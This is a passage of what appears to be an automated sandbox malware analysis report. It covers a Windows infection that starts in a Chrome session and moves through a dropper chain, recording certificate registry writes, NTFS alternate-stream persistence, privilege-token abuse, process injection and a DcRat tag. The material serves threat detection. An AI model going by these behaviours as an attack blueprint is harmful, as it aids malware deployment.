40b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kav21.3.10.391en_26075.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kav21.3.10.391en_26075.exe -
NTFS ADS 4 IoCs
Processes:
rkfree_setup64.exedescription ioc process File opened for modification C:\ProgramData\rkfree:uninst rkfree_setup64.exe File opened for modification C:\ProgramData\rvlkl:cfg rkfree_setup64.exe File opened for modification C:\ProgramData\rvlkl:uninst rkfree_setup64.exe File opened for modification C:\ProgramData\rkfree:cfg rkfree_setup64.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 567 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 679 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 685 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
Processes:
pid process 3080 3080 3080 3080 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeInstall.exeQ_al8h5yJr2pfKnyjDa7K4bP.exeInstall.exeInstall.exerd1hX32qxbTEj_w1iCuwV_j3.exeVFAG5UfCz7e3IdvdI8v01u_M.exeiZr04NHQo2wt4BXC1sIRm5E6.exepid process 1316 chrome.exe 1316 chrome.exe 5068 chrome.exe 5068 chrome.exe 1332 chrome.exe 1332 chrome.exe 448 chrome.exe 448 chrome.exe 4324 chrome.exe 4324 chrome.exe 5516 chrome.exe 5516 chrome.exe 220 chrome.exe 220 chrome.exe 5176 chrome.exe 5176 chrome.exe 2820 chrome.exe 2820 chrome.exe 1372 chrome.exe 1372 chrome.exe 1372 chrome.exe 1372 chrome.exe 5084 chrome.exe 5084 chrome.exe 3840 chrome.exe 3840 chrome.exe 2572 chrome.exe 2572 chrome.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 4944 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 4196 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 5840 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
rvlkl.exetaskmgr.execmd.exepid process 3496 rvlkl.exe 3080 8276 taskmgr.exe 5564 cmd.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 668 668 668 668 -
Suspicious behavior: MapViewOfSection 15 IoCs
Processes:
cmd.exe0ESIFYudXNYZaYrWCRa9HdY_.execmd.execmd.exepid process 2784 cmd.exe 2784 cmd.exe 2220 0ESIFYudXNYZaYrWCRa9HdY_.exe 1252 cmd.exe 1252 cmd.exe 3080 3080 3080 3080 5564 cmd.exe 5564 cmd.exe 5564 cmd.exe 5564 cmd.exe 5564 cmd.exe 5564 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
chrome.exemsedge.exemsedge.exechrome.exepid process 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 20004 msedge.exe 36048 msedge.exe 36048 msedge.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe 37036 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Q_al8h5yJr2pfKnyjDa7K4bP.exeqkftJGDPHrj6GpoYfaz9kGzw.exerobocopy.execNqK1rl2lwvcIXjaMDuEDhDV.exemRs1315_U1bIiV5F6j7EgWjc.exeVFAG5UfCz7e3IdvdI8v01u_M.exeiZr04NHQo2wt4BXC1sIRm5E6.exeKBHKAC88D1F3HM2.exenIS_6lAPkuiAD1vGQNmAscKo.exerd1hX32qxbTEj_w1iCuwV_j3.exe0M20GBJKA66FG9A.exe49AAFB727CL5GDI.exetaskkill.exehe1ZfC3bR4eCfnDzT1OlvgXI.exeuEu3BlPDRxDD3lXheMCJwF3k.exeAppLaunch.exeSpCSbJF2gtnaYf15VB7gkWOO.exetaskmgr.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe Token: SeDebugPrivilege 3608 qkftJGDPHrj6GpoYfaz9kGzw.exe Token: SeBackupPrivilege 5900 robocopy.exe Token: SeRestorePrivilege 5900 robocopy.exe Token: SeSecurityPrivilege 5900 robocopy.exe Token: SeTakeOwnershipPrivilege 5900 robocopy.exe Token: SeDebugPrivilege 5988 cNqK1rl2lwvcIXjaMDuEDhDV.exe Token: SeDebugPrivilege 4288 mRs1315_U1bIiV5F6j7EgWjc.exe Token: SeDebugPrivilege 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe Token: SeDebugPrivilege 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe Token: SeDebugPrivilege 47800 KBHKAC88D1F3HM2.exe Token: SeDebugPrivilege 2412 nIS_6lAPkuiAD1vGQNmAscKo.exe Token: SeDebugPrivilege 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe Token: SeDebugPrivilege 50772 0M20GBJKA66FG9A.exe Token: SeDebugPrivilege 50956 49AAFB727CL5GDI.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 6944 taskkill.exe Token: SeDebugPrivilege 3488 he1ZfC3bR4eCfnDzT1OlvgXI.exe Token: SeDebugPrivilege 1732 uEu3BlPDRxDD3lXheMCJwF3k.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 50916 AppLaunch.exe Token: SeDebugPrivilege 4028 SpCSbJF2gtnaYf15VB7gkWOO.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 8276 taskmgr.exe Token: SeSystemProfilePrivilege 8276 taskmgr.exe Token: SeCreateGlobalPrivilege 8276 taskmgr.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeDebugPrivilege 6728 InstallUtil.exe Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 Token: SeShutdownPrivilege 3080 Token: SeCreatePagefilePrivilege 3080 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 3080 8276 taskmgr.exe 8276 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 5068 chrome.exe 3080 3080 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe 8276 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
rkfree_setup_301_password_123.exerkfree_setup64.exervlkl.exeInstall.exeQ_al8h5yJr2pfKnyjDa7K4bP.exeInstall.exeInstall.exe9ttTG63SaCJEubu9iGdOslGV.exeOtV01fNRpBSqIMPnvBIz_5U1.exeX70ItBxukSvymp13PgQhBSOh.exe8yRrDWZmXks9IvL_IS0nj_06.exe0ESIFYudXNYZaYrWCRa9HdY_.exeiZr04NHQo2wt4BXC1sIRm5E6.exeMmwt5y3s3zj3YZRq2H7QWLkZ.exetW7Y0_b8aGCZGB9K4Cnu3Izl.exerd1hX32qxbTEj_w1iCuwV_j3.exeVFAG5UfCz7e3IdvdI8v01u_M.exe1GPK0P7aXVq71TQv22DqyPmM.exejR5Q7PgDKXRyFifhSjYEWAo0.exemRs1315_U1bIiV5F6j7EgWjc.execNqK1rl2lwvcIXjaMDuEDhDV.exeepJtHFnMJr1xk7GmIRKBf6e5.exeInstall.exejR5Q7PgDKXRyFifhSjYEWAo0.tmpInstall.exeHees5gyHhxQ9S2TKRxCAvjcm.exeepJtHFnMJr1xk7GmIRKBf6e5.exedllhusts.exeMID2G1BELCG7H55.execmd.exeuEu3BlPDRxDD3lXheMCJwF3k.exehe1ZfC3bR4eCfnDzT1OlvgXI.exeKD005C2835911EG.exeRegAsm.exeOtV01fNRpBSqIMPnvBIz_5U1.exeSearchApp.exeUpdater.exeOtV01fNRpBSqIMPnvBIz_5U1.exeOtV01fNRpBSqIMPnvBIz_5U1.exebuild2.exexsv.exebuild3.exeRehab.exe.pifpid process 5736 rkfree_setup_301_password_123.exe 6028 rkfree_setup64.exe 3496 rvlkl.exe 3496 rvlkl.exe 3496 rvlkl.exe 3496 rvlkl.exe 4944 Install.exe 1012 Q_al8h5yJr2pfKnyjDa7K4bP.exe 4196 Install.exe 5840 Install.exe 3264 9ttTG63SaCJEubu9iGdOslGV.exe 2400 OtV01fNRpBSqIMPnvBIz_5U1.exe 1944 X70ItBxukSvymp13PgQhBSOh.exe 3548 8yRrDWZmXks9IvL_IS0nj_06.exe 2220 0ESIFYudXNYZaYrWCRa9HdY_.exe 3492 iZr04NHQo2wt4BXC1sIRm5E6.exe 3836 Mmwt5y3s3zj3YZRq2H7QWLkZ.exe 5292 tW7Y0_b8aGCZGB9K4Cnu3Izl.exe 3128 rd1hX32qxbTEj_w1iCuwV_j3.exe 5508 VFAG5UfCz7e3IdvdI8v01u_M.exe 5316 1GPK0P7aXVq71TQv22DqyPmM.exe 3956 jR5Q7PgDKXRyFifhSjYEWAo0.exe 4288 mRs1315_U1bIiV5F6j7EgWjc.exe 5988 cNqK1rl2lwvcIXjaMDuEDhDV.exe 3720 epJtHFnMJr1xk7GmIRKBf6e5.exe 3568 Install.exe 12868 jR5Q7PgDKXRyFifhSjYEWAo0.tmp 5092 Install.exe 2204 Hees5gyHhxQ9S2TKRxCAvjcm.exe 44000 epJtHFnMJr1xk7GmIRKBf6e5.exe 3772 dllhusts.exe 4244 MID2G1BELCG7H55.exe 5564 cmd.exe 1732 uEu3BlPDRxDD3lXheMCJwF3k.exe 3488 he1ZfC3bR4eCfnDzT1OlvgXI.exe 4944 KD005C2835911EG.exe 4944 KD005C2835911EG.exe 2068 RegAsm.exe 5632 OtV01fNRpBSqIMPnvBIz_5U1.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 8360 Updater.exe 5564 cmd.exe 8820 OtV01fNRpBSqIMPnvBIz_5U1.exe 11168 OtV01fNRpBSqIMPnvBIz_5U1.exe 4364 build2.exe 3396 xsv.exe 10952 build3.exe 11480 Rehab.exe.pif 3080 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 7116 SearchApp.exe 3080 3080 3080 3080 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 5068 wrote to memory of 3392 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 3392 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1960 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1316 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 1316 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe PID 5068 wrote to memory of 4728 5068 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.logixoft.com/es-es/index1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc66a24f50,0x7ffc66a24f60,0x7ffc66a24f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3024 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:12⤵
- DcRat
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4612 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4444 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
